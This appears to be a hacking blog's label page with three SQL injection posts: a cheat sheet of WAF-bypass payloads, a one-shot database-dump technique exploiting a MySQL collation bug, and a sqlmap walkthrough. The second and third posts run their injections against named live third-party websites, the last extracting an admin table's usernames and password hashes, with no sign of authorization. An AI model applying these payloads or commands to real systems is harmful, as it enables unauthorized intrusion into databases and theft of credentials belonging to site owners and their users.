Showing posts with label SQL INJECTION. Show all posts
Showing posts with label SQL INJECTION. Show all posts

Sql injection (waf bypass)


 
Note: Before starting this topic, I want to clarify that I won't be covering on basic SQL Injection attacks. This article is meant for WAF /Filter bypassing during Injection.

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and Cross Site Scripting (XSS) attacks.

How does it Work?


When WAF detects any malicious input from end user, It gives 403 Forbidden, 406 Not Acceptable or any Kind of Custom errors 



How to bypass this thing?


So, what to do next? we cant do our further injection right? 

Well its time to use various techniques to bypass thing. Some of these techniques are mentioned below:

# Case Changing:


Most of the Waf's only filter lowercase or higher-case keywords. We can easily evade that kind of wafs by using alternate case. 
if union select is forbidden , we can always try UNION SELECT instead. And if both does not work, We can try our luck with using mixture of both. like UniOn seLeCt

# Using Comments


SQL comments really help us in many cases. They play their important role in killing some Waf's Restrictions. e.g

// , -- , --+ , #, -- - 

# Inline Comments


Some WAF’s filter keywords like /union\sselect/ig We can bypass these filters by using inline comments most of the time

http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,3--




Tip: Read SQLi Errors carefully. Sometimes they left error from which we can have idea that how waf is working on this site.


Anyways, We were talking about Filtered Keywords. So it does not mean that waf is only filtering union select. It may be filtering all SQL keywords like table_name, column_name etc

So might need to apply these inline comments on those keywords as well. Example


http://localhost/waf.php?id=1 /*!union*/ /*!select*/ 1,2,/*!table_name*/,4,5 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema*/=database()--

# Double use of Keywords


Sometimes WAF removes whole keyword from the query and execute it and throw errors

In such cases, we can use keywords in this way


http://localhost/waf.php?id=1 UNunionION SELselectECT 1,2,3,4,5,6--

Anyways It totally depends upon the scenario. Im just giving a common Idea. Rest is upon you that how you use it.

# Using Different types of Whitespaces


Sometime Waf may be filtering the whitespace we are using between keywords. We mostly use Spaces But space is not the only whitespace we can use in SQL injection. We have some other options as well

for example + . 

%20 is use for space, but we can try using one of these whitespaces . some examples are %09 %0A %0B %0C %0D %A0


inurl: 

union%0Bselect%0B1,2,3--


# Encoding

We can always try our luck with URL encode thing to bypass WAF. For example we can use 


union select 1,/*!table_name*/,3 from information_schema.tables where table_schema=database()

as 

union%20select%201,%2f%2a%21table_name%2a%2f,3%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29 

but sometime waf filter also filter % itself. So we have to use double URL encoding in that case


union%2520select%25201,%2f%2a%21table_name%2a%2f%2520,3 from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529

# Unexpected Input

This scenario is very rare that we have to use buffer overflow or give unexpected query /request to trick WAF filters. 

for example:


http://localhost/waf.php?id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) union select 1,2,3,4,5--

This thing only worked once for me. But knowledge is Power, may be you face any scenario that can be bypassed by using buffer overflow

# use all above mentioned techniques together

ah.. tried all those things but still its showing NOT ACCEPTABLE or FORBIDDEN. well its time to use all these above mentioned techniques combined.

For example: you can use alternative cases with inline comments or obfuscation.

#Some Common Union Select Solutions:

%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT

I hope you have enjoyed this article. Please give us your feedback. So that we maybe able to make things more clear for you next time .

New kind of dios using UTF-8 bug By Benzi

toc
-intro
-insert()
-replace()

intro
up to now, to perform dios query, we used local variable.
today, i will show you a way of dump the whole table, without local variable.
but i wanna talk about the bug first.
in mysql, theres a bug, that if theres a utf8 column, and replace some of the content with another utf8/binary content, the webserver wont delete the previous content.
for example, lets say i have a table named "books", with the column "color".
Code:
SELECT `color` FROM `books`;
red
green
blue

if i wanna add "!" after the word, i can do it by using insert() function.
Code:
SELECT insert("!",1,0,color) FROM books;
red!
green!
blue!

but what if i use 0x21 instead of "!" ?
Code:
SELECT insert(0x21,1,0,color) FROM books;
red!
greenred!
bluegreenred!

we got us a bug.
as we can see, the rows are being concat to each other, and the last row contains all the records.
so what if we use information_schema instead?
Code:
SELECT insert(0x21,1,0,table_name) FROM information_schema 0.e.tables where table_schema not like 'inf%';
table1!
table2table1!
table3table2table1!

why is this happening?
collation('!') = latin1
collation(0x21) = binary
collation(table_name) = utf8.
apperently mysql 5.1+ cant handle mix of utf8 and binary.

a few docs on bugs.mysql-
https://bugs.mysql.com/bug.php?id=49271
https://bugs.mysql.com/bug.php?id=7642
https://bugs.mysql.com/bug.php?id=12351
https://bugs.mysql.com/bug.php?id=16716
https://bugs.mysql.com/bug.php?id=69891
https://bugs.mysql.com/bug.php?id=64338
https://bugs.mysql.com/bug.php?id=9011
https://bugs.mysql.com/bug.php?id=7874
https://bugs.mysql.com/bug.php?id=10572
https://bugs.mysql.com/bug.php?id=3796
https://bugs.mysql.com/bug.php?id=8785
https://bugs.mysql.com/bug.php?id=38980

insert()
as we saw on the intro, we can perform dios using insert().
now i will demonstrate on a live site.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,4

lets try to see if the bug exist.
in this site, theres 1267 (illegal mix) bug, so i will use unhex(hex()).
its ironic, because 1267 suppose to be a fix of that bug. Smile
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,insert(0x1,1,0,unhex(hex(table_name))) from information_schema 0.e.tables

[Image: YzwUKo1.png]

as we can see, each row contains the previous raw.
which means, the last raw contains all the data.
but how can we see only the last row?
well, with limit.
first, we will count the table, and via the last raw by using "limit count-1,1".
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,count(*) from information_schema 0.e.tables
59, which means limit 58,1.
we decreasing one number, because the counting starts with 0.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,insert(0x1,1,0,unhex(hex(table_name))) from information_schema 0.e.tables limit 58,1

[Image: zMS8jfV.png]

all the tables.
lets arrenge it a bit.
we need to fix 3 things-
*the output is backwards
*make it more normal to look
*add columns.

to overcome the first problem, we will add "reverse" function on the table_name, and another one on the whole insert().
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,reverse(insert(0x1,1,0,reverse(unhex(hex(table_name))))) FROM information_schema 0.e.tables limit 58,1

for the 2nd and 3rd problem, we will add "concat", and add column_name and <br>.
the count(*) from columns is 612, so-
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,count(*) FROM information_schema.columns
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,reverse(insert(0x1,1,0,reverse(concat (unhex(hex(table_name)),0x203a20,unhex(hex(column_name)),0x3c62723e)))) from information_schema 0.e.columns limit 611,1

[Image: oFM9VDx.png]

perfect.

replace()
in replace, we just need to find a utf8 column and replace the content of the column with the content we want.
fortunately, all the system variables are utf8.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,replace(@@version,5,@@version) from information_schema 0.e.tables

[Image: caua5BC.png]

same bug.
now we will replace the second version with the table_name and column_name concated to @@version, and instead of '5', i will put @@version, to clean our field.
be sure to concat @@version, because we need it to be utf8.
Code:
http://www.replasticsurgery.asia/readnews.php?id=4 and 0 union select 1,2,3,replace(@@version,@@version,concat (unhex(hex(table_name)),0x203a20,unhex(hex(column_name)),0x3c62723e,@@version)) from information_schema 0.e.columns limit 611,1

[Image: hCcfMY6.png]

did i say perfect? i believe so. ;)
hope you learned something. Smile

SQLmap installation

Today we will learn how to use SQLmap in such linux system where it doesnt installed already
penetration testing based linux os like backtrack backbox blackbunut, sqlmap comes already installed .
but you can use sqlmap on other system easily :)

how ??? ok follow these steps , its really not a big deal ;)

SQLmap official website , from where you can download sqlmap source code
http://sqlmap.org/

download link :-
https://github.com/sqlmapproject/sqlmap/zipball/master


sqlmap source code has been saved with name master
its zip file, to extract its content run command unzip master.
you will get a directory having name sqlmap project something like that, enter into that directory and list files

yesssss :) . here is our sqlmap source code .
sqlmap is coded in python and sqlmap.py is the main file which is used for performing SQL injection.
so lets start >:D<
  you can run sqlmap.py in 2 ways, either using python or using ./ ;)
python sqlmap.py  option
./sqlmap.py option
if sqlmap.py file has execute permission, you can run sqlmap using ./
for listing available options for sqlmap usage , supply -h option
like this
./sqlmap.py -h
he is the link where you can get options
https://github.com/sqlmapproject/sqlmap/wiki/Usage

for example i want to extract database of a sql injection vulnerable website using sqlmap
website link is http://www.iapex.com.pk/messages.php?id=4
command will be
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   --dbs
here -u stands for sql injection vulnerable url
--dbs stands for databases  \ ^_^ /
as you will run this command , sqlmap will start injecting thi url and will extract databases name

after completion of process , you will get results like this

like, now you want to get list of tables in database, you will need to specify database name
./sqlmap.py  -u webite.com/vulnerable.php?id=4   -D database_name --tables
in my case i am going for database having name iapexcom_new

so command will be
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new --tables
here -D stands for , database that has to be enumerate
we have 2 databases , we can enumerate tables from these database .
in above command we are enumerating table list of database iapexcom_new

after completion of process , sqlmap will show list of tables under database

and so on :)

as we know
database has tables and every table has columns .
columns contains information/data
so performing sql injection using sqlmap,first we extract database name ,then tables list from that database
after extracting tables name , we select a table and extract list of columns in that table
and then we can get information stored in columns 
lets extract columns from table of database ;)
i am going for table es_admin because this table contains columns which has username and password of website admin stored in it :P
 ./sqlmap.py  -u website.com/vulnerable.php?id=4   -D idatabase_name -T table_name --columns
ok
query will be

 ./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new -T es_admin --columns

meaning of this command is
inject a website  url (-u)  http://www.iapex.com.pk/messages.php?id=4  whose database name is  iapexcom_new (-D) and table name is (-T) es_admin and extract names of columns from table

wait for few minutes untill sqlmap extract columns name from table es_admin
it will show result like this

ok now we have columns name too, lets go and extract data stored in these columns :P
command will be
 ./sqlmap.py  -u website.com/vulnerable..php?id=4   -D database_name -T table_name -C column_name --dump

command in my case
./sqlmap.py  -u http://www.iapex.com.pk/messages.php?id=4   -D iapexcom_new -T es_admin -C username,password  --dump


after process completion you will get result like this

you have done >:D<, and you can see username and password hash which are stored in table 'es_admin' in columns having name username and password

this is how you can use sqlmap on linux os where it is not installed already :)
enjoy
Thank you :)